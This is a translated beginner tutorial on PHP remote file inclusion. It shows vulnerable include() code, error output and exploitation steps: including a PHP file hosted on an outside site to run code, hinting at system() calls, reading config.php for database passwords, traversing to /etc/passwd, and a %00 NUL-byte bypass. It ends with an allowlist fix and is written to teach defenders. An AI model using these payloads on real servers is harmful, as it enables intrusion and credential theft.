For beginners, the first question is: what is a "remote file inclusion vulnerability"? The short answer is that the server includes arbitrary files through PHP without filtering strictly enough, and so ends up executing a malicious file. It is a filtering mistake on the programmer's part, and please remember that all CGI programs have this kind of bug.
1. Finding the PHP remote file inclusion bug:
To find a target, we first need to understand what inclusion means: all languages (or most of them) have a way to include arbitrary files. In PHP we use the include() function. Its workflow is:
If you want to include include1.php in main.php, you write include("include1.php"). Not a very scientific explanation, but you get the idea.
Let's look at this first: when the user supplies input, the script includes that file, like this:
    // Vulnerable: the user-supplied "page" value goes straight to include
    if ($_GET['page']) {
        include $_GET['page'];
    } else {
        include "home.php";
    }
This structure is common in dynamic web sites, and the problem is that it allows pages to be viewed through URLs such as http://www.target.com/explame.php?page=main.php or http://www.target.com/explame.php?page=downloads.php. If your program has such a bug, that is unfortunate and you have only yourself to blame: it is only a filtering problem, but it is exactly this kind of filtering gap that script hackers live on. In the zone-h.org survey, file inclusion accounts for 9.4% of attacks, which is enough to deserve attention. It is not a new problem either; it was around years ago, yet to this day plenty of programmers carry on as usual. Hence this article. Writing such an article in 2004 is already old hat, but I still want to write it; after all, a complaint that benefits someone is not just whining.
2. Testing
Here is a remote file inclusion example. Its only purpose is the security of your own program. Let's look at the specifics:
http://www.target.com/explame.php?page=zizzy
    Warning: main(zizzy): failed to open stream: No such file or directory in /var/www/htdocs/index.php on line 3
    Warning: main(): Failed opening 'zizzy' for inclusion (include_path='.:/usr/local/lib/php') in /var/www/htdocs/index.php on line 3
These PHP error messages tell us that the program tried to include the file /var/www/htdocs/zizzy but could not find it: "No such file or directory". Now you understand the PHP remote file inclusion vulnerability.
3. Exploitation
PHP is very capable: it can include files remotely. So I create a yeah.txt and put it on my site at http://www.mysite.com/yeah.txt, with content like this:
    <?php
    echo "wow,test!";
    ?>
Then request http://www.target.com/explame.php?pa...e.com/yeah.txt
OK, it echoes wow,test!, so the file was executed. Reading config.php is not difficult either, and that is where the MySQL password is kept. Write a call to system() into yeah.txt and try it to see what that feels like. Going a little further, submit page=../../../../../../etc/passwd. Now you know what inclusion really means.
4. Another form of the PHP remote file inclusion vulnerability
Sometimes programmers write the include differently, which limits the scope of inclusion:
    // Still vulnerable: only a ".php" suffix is appended to the user input
    if ($_GET['page']) {
        include $_GET['page'] . ".php";
    } else {
        include "home.php";
    }
We submit http://www.target.com/explame.php?pa...e.com/yeah.txt
    Warning: main(http://www.mysite.com/yeah.txt.php): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /var/www/htdocs/explame.php on line 3
    Warning: main(): Failed opening 'http://www.mysite.com/yeah.txt.php' for inclusion (include_path='.:/usr/local/lib/php') in /var/www/htdocs/explame.php on line 3
The include failed because the suffix is forced to .php. So rename yeah.txt on mysite.com to yeah.php, and OK, it executes.
What about passwd?
    Warning: main(../../../../../../../etc/passwd.php): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /var/www/htdocs/explame.php on line 3
    Warning: main(): Failed opening './../../../../../../etc/passwd.php' for inclusion (include_path='.:/usr/local/lib/php') in /var/www/htdocs/explame.php on line 3
Here a NUL character, that is %00, is used to skip the check:
http://www.target.com/explame.php?pa.../etc/passwd%00
See?
5. Recommendations
It is best to specify explicitly which files may be included, or to filter the submitted variable. That is the purpose of this article on the PHP remote file inclusion vulnerability: it is written not for hackers but for programmers who are just starting out. There are many such articles on the Internet; as long as someone benefits from this one, it has achieved its purpose.
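One way to implement the first recommendation, as an added example that is not part of the original article: the include logic from sections 1 and 4 rewritten against a fixed allowlist. The function name resolve_page, the ALLOWED_PAGES constant and the /var/www/htdocs base directory used in the demo are assumptions; the file names are the ones that appear in the URLs above.

```php
<?php
// Added example, not the article's code: allowlist-based include resolution.
// ALLOWED_PAGES and resolve_page() are hypothetical names chosen for this sketch.

const ALLOWED_PAGES = ['home.php', 'main.php', 'downloads.php'];

/**
 * Map the user-supplied "page" value to a file under $baseDir.
 * Only an exact, strict match against ALLOWED_PAGES is accepted, so URLs,
 * "../" sequences, NUL bytes and array input never reach include;
 * everything else falls back to home.php.
 */
function resolve_page($requested, string $baseDir): string
{
    if (!is_string($requested) || !in_array($requested, ALLOWED_PAGES, true)) {
        $requested = 'home.php';
    }
    return $baseDir . DIRECTORY_SEPARATOR . $requested;
}

// Constructed sample inputs, covering the request shapes shown in this article.
$samples = [
    'main.php',
    'zizzy',
    'http://www.mysite.com/yeah.txt',
    '../../../../../../etc/passwd',
    "../../../../../../etc/passwd\0",
    ['main.php'],                      // ?page[]=main.php
];

foreach ($samples as $s) {
    printf(
        "%-45s => %s\n",
        json_encode($s, JSON_UNESCAPED_SLASHES),
        resolve_page($s, '/var/www/htdocs')
    );
}

// In the entry script itself the call would be:
//   include resolve_page($_GET['page'] ?? 'home.php', __DIR__);
```

Only the first sample resolves to main.php; every other input resolves to home.php. Appending a suffix, as in section 4, is not a substitute for this check.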